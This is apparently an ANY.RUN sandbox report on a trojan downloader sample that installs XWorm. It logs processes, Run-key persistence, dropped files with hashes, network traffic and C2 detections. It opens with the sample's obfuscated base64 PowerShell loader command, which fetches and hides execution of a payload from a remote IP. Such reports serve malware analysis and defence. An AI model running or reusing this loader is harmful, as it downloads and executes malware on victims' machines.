ld@C4d@RwBld@HQd@TQBld@HQd@ad@Bvd@GQd@Kd@d@nd@Gwd@ZgBzd@Gcd@ZQBkd@GQd@Zd@Bkd@GQd@Zd@Bkd@GEd@Jwd@pd@C4d@SQBud@HYd@bwBrd@GUd@Kd@d@kd@G4d@dQBsd@Gwd@Ld@d@gd@Fsd@bwBid@God@ZQBjd@HQd@WwBdd@F0d@Id@d@od@Ccd@Id@B0d@Hgd@dd@d@ud@G0d@QQBpd@G0d@bQBhd@G8d@LwBzd@GUd@bd@Bpd@GYd@XwBjd@Gkd@bd@Bid@HUd@cd@d@vd@DEd@NQd@ud@Dkd@Od@d@xd@C4d@Od@d@3d@DEd@Lgd@wd@Dgd@MQd@vd@C8d@Ogd@nd@Cwd@Id@d@nd@Dd@d@Jwd@sd@Cd@d@JwBTd@HQd@YQByd@HQd@dQBwd@E4d@YQBtd@GUd@Jwd@sd@Cd@d@JwBNd@HMd@YgB1d@Gkd@bd@Bkd@Ccd@Ld@d@gd@Ccd@Md@d@nd@Ckd@KQB9d@H0d@';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $ddsdgo.replace('d@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -execC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
18 161
Read events
18 158
Write events
3
Delete events
0

Modification events

(PID) Process:(7100) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
Operation:writeName:VBSFile
Value:
(PID) Process:(6508) Client.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Client
Value:
C:\Users\admin\AppData\Roaming\Client.exe
(PID) Process:(3632) XClient.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:salie
Value:
C:\Users\admin\AppData\Roaming\salie.exe
Executable files
3
Suspicious files
3
Text files
7
Unknown types
0

Dropped files

PID
Process
Filename
Type
6004SecuriteInfo.com.Trojan.DownLoader48.43240.12313.2666.exeC:\Users\admin\AppData\Local\Temp\IXP000.TMP\6855ad5320b4c.vbstext
MD5:5D5A9BC08ABD2ED265FE72325951DE51
SHA256:245F36C7434F4FA509A2AFDA3E586360A4C74E13B0F74C5696FF78942C98865B
3092powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1coy0bzg.c2l.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3640MSBuild.exeC:\Users\admin\AppData\Roaming\Client.exeexecutable
MD5:53D775CF4FEAF31CBBA5D26191EF8935
SHA256:81100619FCD8FAF8886E0427B0BB9681724943B9CF7938B547226EE2FCFCB273
4120powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_eqjrk3nr.o3k.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4120powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3kuzabe0.slg.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4120powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yk1f5czm.uvz.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4120powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hkcwfdez.xbf.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4120powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:A889B651CA328A200E7505BEEBA456FD
SHA256:EC0D3240919BE4B5C7A16D4FDC43BDBB38240FEB3D1DFD6A01D8651DABBE1EB0
3632XClient.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\salie.lnkbinary
MD5:5FA5F914977F02F5763F51D294847D6E
SHA256:2F859123E36B339DD1A7A245BB2F99BCC6810F7424A1E397B1C571BC080DA00F
3640MSBuild.exeC:\Users\admin\AppData\Roaming\XClient.exeexecutable
MD5:7A9B34FEC4E54E87C86F5E4FD90C4C6D
SHA256:3BCBF886F85C9C0DC9CE42D0C538DE3D6DE1184037A22CE9A1706EBDBD958070
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
31
DNS requests
18
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1268
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1268
svchost.exe
GET
200
184.24.77.43:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4120
powershell.exe
GET
200
180.178.189.51:80
http://180.178.189.51/public_files/oammiAm.txt
unknown
unknown
3652
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
3652
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5012
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
2940
svchost.exe
GET
200
72.246.169.163:80
http://x1.c.lencr.org/
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
5944
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1268
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3964
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
4120
powershell.exe
185.199.110.133:443
raw.githubusercontent.com
FASTLY
US
whitelisted
1268
svchost.exe
184.24.77.43:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
1268
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4120
powershell.exe
180.178.189.51:80
KK Networks Pvt Ltd.
PK
unknown
1268
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 4.231.128.59
whitelisted
google.com
  • 142.250.186.142
whitelisted
raw.githubusercontent.com
  • 185.199.110.133
  • 185.199.108.133
  • 185.199.109.133
  • 185.199.111.133
whitelisted
crl.microsoft.com
  • 184.24.77.43
  • 184.24.77.40
  • 184.24.77.37
  • 184.24.77.34
  • 184.24.77.16
  • 184.24.77.11
  • 184.24.77.15
  • 184.24.77.35
  • 184.24.77.6
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 2.23.246.101
whitelisted
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.3.187.198
whitelisted
login.live.com
  • 20.190.159.131
  • 20.190.159.75
  • 40.126.31.1
  • 40.126.31.130
  • 40.126.31.3
  • 20.190.159.0
  • 20.190.159.2
  • 20.190.159.64
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted

Threats

PID
Process
Class
Message
2200
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to access raw user content on GitHub
6508
Client.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] Xworm Network Packet
4120
powershell.exe
Potentially Bad Traffic
PAYLOAD [ANY.RUN] Reverse Base64 Encoded EXE Inbound
4120
powershell.exe
A Network Trojan was detected
ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound
3632
XClient.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] Xworm Network Packet
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
SecuriteInfo.com.Trojan.DownLoader48.43240.12313.2666